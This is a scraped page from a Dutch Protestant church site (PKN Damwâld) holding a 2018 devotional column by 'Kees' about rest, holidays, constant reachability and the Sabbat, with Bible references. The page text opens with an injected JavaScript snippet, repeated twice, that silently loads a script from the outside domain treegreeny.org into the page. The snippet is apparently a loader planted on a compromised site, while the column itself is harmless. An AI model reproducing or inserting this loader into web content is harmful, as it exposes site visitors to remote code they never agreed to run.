;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Eindelijk rust? - PKN Damwâld

Eindelijk rust?

Gepubliceerd op: donderdag 28 juni 2018

Hebt u het ook zo druk gehad en aan vakantie toe? Het vakantieseizoen staat voor de deur en in deze zomertijd gaan velen van ons er een tijdje tussenuit, op zoek naar rust en ontspanning. Sommigen geven de voorkeur aan een verre reis, anderen boeken een vakantie in ons eigen mooie land en er zijn er ook die thuis blijven, gewoon omdat ze dat fijn vinden. Er zijn er echter ook die om bepaalde redenen niet op vakantie kunnen gaan en aan huis gebonden zijn. Bijvoorbeeld omdat de gezondheid het niet toelaat, of omdat er gewoon geen geld voor is. Dit komt helaas steeds vaker voor in onze moderne maatschappij. In onze samenleving lijkt het ook dat mensen niet tot rust kunnen komen, ook niet tijdens de vakanties of weekeinden. De rust komt niet vanzelf, de onrust wel, dat is het kenmerk van deze tijd. In onze 24-uurs maatschappij draait alles om werk, consumeren en – niet meer weg te denken – de social media. Mensen hebben het idee om altijd, dag en nacht, maar bereikbaar te moeten zijn, waarom eigenlijk kun je je afvragen. ‘Krijgt men geen gehoor, bellen ze later maar terug’, zei men nog niet eens zo heel lang geleden. Misschien klinkt het wat ouderwets, maar er zit veel waarheid in en het voorkomt stress, want rust is beslist van levensbelang voor ons mensen. Gods plan is rust, maar hoe vind ik die? In de Bijbel zijn er ook wel voorbeelden te vinden die gaan over rust en ontspanning. Toen Jezus bij Maria en Martha op bezoek was, had Martha het zo verschrikkelijk druk met het bereiden van de maaltijd, dat ze de tijd niet nam voor een gesprek met hun Gast. Door in alle rust naar Jezus te luisteren had Maria het goede deel gekozen wat niet van haar zou worden weggenomen.
Een ander voorbeeld is te vinden in Genesis 2 waar het volgende staat: ‘Zo werden de hemel en de aarde in al hun rijkdom voltooid. Op de zevende dag had God zijn werk voltooid, op die dag rustte hij van het werk dat hij gedaan had. God zegende de zevende dag en verklaarde die heilig, want op die dag rustte hij van heel zijn scheppingswerk. Zo belangrijk vond God die zevende dag, dat Hij die als rustdag, Sabbat heeft ingesteld, zodat wij onszelf niet voorbij lopen en na gedane arbeid kunnen genieten van alle goede dingen die wij van Hem ontvangen. Ook vakantie is een middel om ons te onttrekken aan de waan van elke dag en te ontspannen. Misschien een goed idee om uw I-pad, mobiel, en tablet op vakantie te sturen om eindelijk van uw rust te genieten.

Columnist:Kees

Leer mij kennen
Uitgelezen?

Gelukkig hebben wij meer columns!

Bekijk al onze columns